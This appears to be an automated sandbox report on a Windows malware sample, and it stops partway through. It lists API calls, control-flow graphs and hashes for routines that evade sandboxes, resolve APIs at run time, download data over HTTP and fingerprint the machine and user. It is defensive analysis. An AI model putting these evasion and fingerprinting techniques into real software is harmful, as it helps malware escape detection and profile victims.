2210->2216 2211->2206 2228 902038-90205a CloseHandle Sleep OpenEventA 2215->2228 2229 90205c-902070 CreateEventA call 901cf0 call 9001a0 2215->2229 2216->2215 2217 901ff8-901ffa lstrcpy 2216->2217 2217->2215 2228->2228 2228->2229 2233 902075-90207e CloseHandle ExitProcess 2229->2233
                            APIs
                              • Part of subcall function 009065A0: GetProcAddress.KERNEL32(76210000,012F1728), ref: 009065F9
                              • Part of subcall function 009065A0: GetProcAddress.KERNEL32(76210000,012F1608), ref: 00906612
                              • Part of subcall function 009065A0: GetProcAddress.KERNEL32(76210000,012F1590), ref: 0090662A
                              • Part of subcall function 009065A0: GetProcAddress.KERNEL32(76210000,012F1710), ref: 00906642
                              • Part of subcall function 009065A0: GetProcAddress.KERNEL32(76210000,012F90B0), ref: 0090665B
                              • Part of subcall function 009065A0: GetProcAddress.KERNEL32(76210000,012E64D8), ref: 00906673
                              • Part of subcall function 009065A0: GetProcAddress.KERNEL32(76210000,012E6558), ref: 0090668B
                              • Part of subcall function 009065A0: GetProcAddress.KERNEL32(76210000,012F16B0), ref: 009066A4
                              • Part of subcall function 009065A0: GetProcAddress.KERNEL32(76210000,012F1650), ref: 009066BC
                              • Part of subcall function 009065A0: GetProcAddress.KERNEL32(76210000,012F1548), ref: 009066D4
                              • Part of subcall function 009065A0: GetProcAddress.KERNEL32(76210000,012F1740), ref: 009066ED
                              • Part of subcall function 009065A0: GetProcAddress.KERNEL32(76210000,012E6638), ref: 00906705
                              • Part of subcall function 009065A0: GetProcAddress.KERNEL32(76210000,012F1560), ref: 0090671D
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 00901DFF
                            • ExitProcess.KERNEL32 ref: 00901E37
                            • GetSystemInfo.KERNEL32(?), ref: 00901E41
                            • ExitProcess.KERNEL32 ref: 00901E4F
                              • Part of subcall function 008E1030: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 008E1046
                              • Part of subcall function 008E1030: VirtualAllocExNuma.KERNEL32(00000000), ref: 008E104D
                              • Part of subcall function 008E1030: ExitProcess.KERNEL32 ref: 008E1058
                              • Part of subcall function 008E10C0: GlobalMemoryStatusEx.KERNEL32 ref: 008E10EA
                              • Part of subcall function 008E10C0: ExitProcess.KERNEL32 ref: 008E1114
                            • GetUserDefaultLangID.KERNEL32 ref: 00901E5F
                            • ExitProcess.KERNEL32 ref: 00901E82
                            • ExitProcess.KERNEL32 ref: 00901EB1
                            • lstrlen.KERNEL32(012F92A0), ref: 00901EBE
                            • lstrcpy.KERNEL32(00000000,?), ref: 00901EE5
                            • lstrcat.KERNEL32(00000000,012F92A0), ref: 00901EED
                            • lstrlen.KERNEL32(00914BA0), ref: 00901EF8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00901F18
                            • lstrcat.KERNEL32(00000000,00914BA0), ref: 00901F24
                            • lstrlen.KERNEL32(00000000), ref: 00901F33
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00901F59
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00901F64
                            • lstrlen.KERNEL32(00914BA0), ref: 00901F6F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00901F8C
                            • lstrcat.KERNEL32(00000000,00914BA0), ref: 00901F98
                            • lstrlen.KERNEL32(00000000), ref: 00901FA7
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00901FC9
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00901FD4
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$Process$Exitlstrcpy$lstrcatlstrlen$AllocCurrentDefaultGlobalInfoLangMemoryNumaStatusSystemUserVirtual
                            • String ID:
                            • API String ID: 3366406952-0
                            • Opcode ID: 59c03cb10c5d04285cd71503fc49edadd1797615c45d8fad98b77a5985cc122b
                            • Instruction ID: a78c2b6b062d7359ea6a99abe61d49bfc08ad83905ad86db227e10dbb62e9de1
                            • Opcode Fuzzy Hash: 59c03cb10c5d04285cd71503fc49edadd1797615c45d8fad98b77a5985cc122b
                            • Instruction Fuzzy Hash: F2717C31900256AFDB21ABB5DC9DBAE3ABEFF45701F448024F906E7191DF709902CB61
                            Function 008E6C40 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 229networkstringfileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2234 8e6c40-8e6c64 call 8e2930 2237 8e6c66-8e6c6b 2234->2237 2238 8e6c75-8e6c97 call 8e4bc0 2234->2238 2237->2238 2240 8e6c6d-8e6c6f lstrcpy 2237->2240 2242 8e6caa-8e6cba call 8e2930 2238->2242 2243 8e6c99 2238->2243 2240->2238 2247 8e6cbc-8e6cc2 lstrcpy 2242->2247 2248 8e6cc8-8e6cf5 InternetOpenA StrCmpCA 2242->2248 2244 8e6ca0-8e6ca8 2243->2244 2244->2242 2244->2244 2247->2248 2249 8e6cfa-8e6cfc 2248->2249 2250 8e6cf7 2248->2250 2251 8e6ea8-8e6ebb call 8e2930 2249->2251 2252 8e6d02-8e6d22 InternetConnectA 2249->2252 2250->2249 2259 8e6ebd-8e6ebf 2251->2259 2260 8e6ec9-8e6ee0 call 8e2a20 * 2 2251->2260 2253 8e6d28-8e6d5d HttpOpenRequestA 2252->2253 2254 8e6ea1-8e6ea2 InternetCloseHandle 2252->2254 2257 8e6e94-8e6e9e InternetCloseHandle 2253->2257 2258 8e6d63-8e6d65 2253->2258 2254->2251 2257->2254 2261 8e6d7d-8e6dad HttpSendRequestA HttpQueryInfoA 2258->2261 2262 8e6d67-8e6d77 InternetSetOptionA 2258->2262 2259->2260 2265 8e6ec1-8e6ec3 lstrcpy 2259->2265 2263 8e6daf-8e6dd3 call 9073f0 call 8e2a20 * 2 2261->2263 2264 8e6dd4-8e6de4 call 903f60 2261->2264 2262->2261 2264->2263 2275 8e6de6-8e6de8 2264->2275 2265->2260 2277 8e6dee-8e6e07 InternetReadFile 2275->2277 2278 8e6e8d-8e6e8e InternetCloseHandle 2275->2278 2277->2278 2280 8e6e0d 2277->2280 2278->2257 2282 8e6e10-8e6e15 2280->2282 2282->2278 2283 8e6e17-8e6e3d call 907520 2282->2283 2286 8e6e3f call 8e2a20 2283->2286 2287 8e6e44-8e6e51 call 8e2930 2283->2287 2286->2287 2291 8e6e53-8e6e57 2287->2291 2292 8e6e61-8e6e8b call 8e2a20 InternetReadFile 2287->2292 2291->2292 2293 8e6e59-8e6e5b lstrcpy 2291->2293 2292->2278 2292->2282 2293->2292
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 008E6C6F
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008E6CC2
                            • InternetOpenA.WININET(0090CFF4,00000001,00000000,00000000,00000000), ref: 008E6CD5
                            • StrCmpCA.SHLWAPI(?,012FFAC8), ref: 008E6CED
                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 008E6D15
                            • HttpOpenRequestA.WININET(00000000,GET,?,012FF1C8,00000000,00000000,-00400100,00000000), ref: 008E6D50
                            • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 008E6D77
                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 008E6D86
                            • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 008E6DA5
                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 008E6DFF
                            • lstrcpy.KERNEL32(00000000,?), ref: 008E6E5B
                            • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 008E6E7D
                            • InternetCloseHandle.WININET(00000000), ref: 008E6E8E
                            • InternetCloseHandle.WININET(?), ref: 008E6E98
                            • InternetCloseHandle.WININET(00000000), ref: 008E6EA2
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008E6EC3
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
                            • String ID: ERROR$GET
                            • API String ID: 3687753495-3591763792
                            • Opcode ID: 804af9a903e92aceb5a6250c26a9bb77fb245ad813d1ae33db8f0c7b2589d02a
                            • Instruction ID: 75510acaf86b08db1b82d89e0c04e699799e5706e7d391df9da26fa7b480f196
                            • Opcode Fuzzy Hash: 804af9a903e92aceb5a6250c26a9bb77fb245ad813d1ae33db8f0c7b2589d02a
                            • Instruction Fuzzy Hash: 0381BE72A40256ABEB20DFA5DC49FEE77B8FF45750F144128F905E7280EB70AE418B91
                            Function 00902910 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 93memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2782 902910-902953 GetWindowsDirectoryA 2783 902955 2782->2783 2784 90295c-9029ba GetVolumeInformationA 2782->2784 2783->2784 2785 9029bc-9029c2 2784->2785 2786 9029c4-9029d7 2785->2786 2787 9029d9-9029f0 GetProcessHeap RtlAllocateHeap 2785->2787 2786->2785 2788 9029f2-9029f4 2787->2788 2789 9029f6-902a14 wsprintfA 2787->2789 2790 902a2b-902a42 call 9073f0 2788->2790 2789->2790
                            APIs
                            • GetWindowsDirectoryA.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 0090294B
                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,008F9506,00000000,00000000,00000000,00000000), ref: 0090297C
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009029DF
                            • RtlAllocateHeap.NTDLL(00000000), ref: 009029E6
                            • wsprintfA.USER32 ref: 00902A0B
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowswsprintf
                            • String ID: :\$C
                            • API String ID: 2572753744-3309953409
                            • Opcode ID: fc2d04e61c495fbdf9606ab5b348893574da5c52be6360b108d641f2a1078c51
                            • Instruction ID: a74fc0080a88b2912a50ede60c730da6d7f9198ac405b53b2c456527af81ea89
                            • Opcode Fuzzy Hash: fc2d04e61c495fbdf9606ab5b348893574da5c52be6360b108d641f2a1078c51
                            • Instruction Fuzzy Hash: D731A6B1D042499FCB14DFB89A89AEFFFBCFF58710F10416AE515E7250E6348A408BA1
                            Function 008E4A60 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 119memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2850 8e4a60-8e4afc RtlAllocateHeap 2867 8e4afe-8e4b03 2850->2867 2868 8e4b7a-8e4bbe VirtualProtect 2850->2868 2869 8e4b06-8e4b78 2867->2869 2869->2868
                            APIs
                            • RtlAllocateHeap.NTDLL(00000000), ref: 008E4AA2
                            • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 008E4BB0
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeapProtectVirtual
                            • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                            • API String ID: 1542196881-3329630956
                            • Opcode ID: 4dfa635067f1b867f561448f5c8d27fcc5a671b83b6186a857e7a50aabc1d9d6
                            • Instruction ID: 0cee0204e48564d14028616bd5650e0ee2054212d605a43e48b65b62912c1f3d
                            • Opcode Fuzzy Hash: 4dfa635067f1b867f561448f5c8d27fcc5a671b83b6186a857e7a50aabc1d9d6
                            • Instruction Fuzzy Hash: 7A31E0A1F80A6C76A6306BF66C4AFFF7E5DDFCDF68B004256F4085618189A055C1CAE2
                            Function 00902C10 Relevance: 4.5, APIs: 3, Instructions: 33memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00902C3F
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00902C46
                            • GetUserNameA.ADVAPI32(00000000,00000104), ref: 00902C5A
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateNameProcessUser
                            • String ID:
                            • API String ID: 1296208442-0
                            • Opcode ID: 8a46a3fecec86b16cf83a420dfb5d9facad5338517d9aad85e75152f7c73619e
                            • Instruction ID: c15433af4f9ec2cfb761e9ad55d248661b06f5127d43e5c0279f90bbe9f560fe
                            • Opcode Fuzzy Hash: 8a46a3fecec86b16cf83a420dfb5d9facad5338517d9aad85e75152f7c73619e
                            • Instruction Fuzzy Hash: 78F0B4B1A40244AFC700DF88DD49F9ABBBCF748B21F100226F914E3280D774190486E1
                            Function 008FF390 Relevance: 102.7, APIs: 57, Strings: 1, Instructions: 1156stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(0090CFF4), ref: 008FF3B5
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008FF3D1
                            • lstrlen.KERNEL32(0090CFF4), ref: 008FF3DC
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008FF3F5
                            • lstrlen.KERNEL32(0090CFF4), ref: 008FF400
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008FF419
                            • lstrcpy.KERNEL32(00000000,00914FA4), ref: 008FF43E
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008FF46C
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008FF4A0
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008FF4D0
                            • lstrlen.KERNEL32(012E6538), ref: 008FF4F5
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen
                            • String ID: ERROR
                            • API String ID: 367037083-2861137601
                            • Opcode ID: 08767cb6152004faadb95b2470de99565a5837e681b2df7785ac9124cf0a89e3
                            • Instruction ID: aa88e574db1100263731fc3ce7de1c4c69aad650c8c812663ff41d1497e733bb
                            • Opcode Fuzzy Hash: 08767cb6152004faadb95b2470de99565a5837e681b2df7785ac9124cf0a89e3
                            • Instruction Fuzzy Hash: C0A25E7190124A9FCB20EF79D848A6ABBB4FF45714F188079EA05DB362EB31DC42CB51
                            Function 009001A0 Relevance: 63.1, APIs: 40, Strings: 1, Instructions: 1571stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 009001E3
                            • lstrlen.KERNEL32(0090CFF4), ref: 0090028D
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 009002B1
                            • lstrlen.KERNEL32(0090CFF4), ref: 009002BC
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 009002E0
                            • lstrlen.KERNEL32(0090CFF4), ref: 009002EB
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 0090030F
                            • lstrlen.KERNEL32(0090CFF4), ref: 0090032A
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 00900359
                            • lstrlen.KERNEL32(0090CFF4), ref: 00900364
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 00900393
                            • lstrlen.KERNEL32(0090CFF4), ref: 0090039E
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 009003D6
                            • lstrlen.KERNEL32(0090CFF4), ref: 00900420
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 00900458
                            • lstrcpy.KERNEL32(00000000,?), ref: 0090076B
                            • lstrlen.KERNEL32(012E6598), ref: 0090077B
                            • lstrcpy.KERNEL32(00000000,?), ref: 009007A7
                            • lstrcat.KERNEL32(00000000,?), ref: 009007B3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 009007DE
                            • lstrlen.KERNEL32(012FF168), ref: 009007F5
                            • lstrcpy.KERNEL32(00000000,?), ref: 0090081C
                            • lstrcat.KERNEL32(00000000,?), ref: 00900828
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00900851
                            • lstrlen.KERNEL32(012E66B8), ref: 00900868
                            • lstrcpy.KERNEL32(00000000,?), ref: 00900899
                            • lstrcat.KERNEL32(00000000,?), ref: 009008A5
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 009008D6
                            • lstrcpy.KERNEL32(00000000,012F9230), ref: 0090091B
                              • Part of subcall function 008E1530: lstrcpy.KERNEL32(00000000,?), ref: 008E1557
                              • Part of subcall function 008E1530: lstrcpy.KERNEL32(00000000,?), ref: 008E1579
                              • Part of subcall function 008E1530: lstrcpy.KERNEL32(00000000,?), ref: 008E159B
                              • Part of subcall function 008E1530: lstrcpy.KERNEL32(00000000,?), ref: 008E15FF
                            • lstrcpy.KERNEL32(00000000,?), ref: 0090094F
                            • lstrcpy.KERNEL32(00000000,012FF180), ref: 009009B7
                            • lstrcpy.KERNEL32(00000000,012F93E0), ref: 00900A28
                            • lstrcpy.KERNEL32(00000000,fplugins), ref: 00900A9F
                            • lstrcpy.KERNEL32(00000000,?), ref: 00900AF8
                            • lstrcpy.KERNEL32(00000000,012F92F0), ref: 00900BC8
                              • Part of subcall function 008E24E0: lstrcpy.KERNEL32(00000000,?), ref: 008E2528
                              • Part of subcall function 008E24E0: lstrcpy.KERNEL32(00000000,?), ref: 008E254E
                              • Part of subcall function 008E24E0: lstrcpy.KERNEL32(00000000,?), ref: 008E2577
                            • lstrcpy.KERNEL32(00000000,012F92E0), ref: 00900C9E
                            • lstrcpy.KERNEL32(00000000,?), ref: 00900D51
                            • lstrcpy.KERNEL32(00000000,012F92E0), ref: 00900F28
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
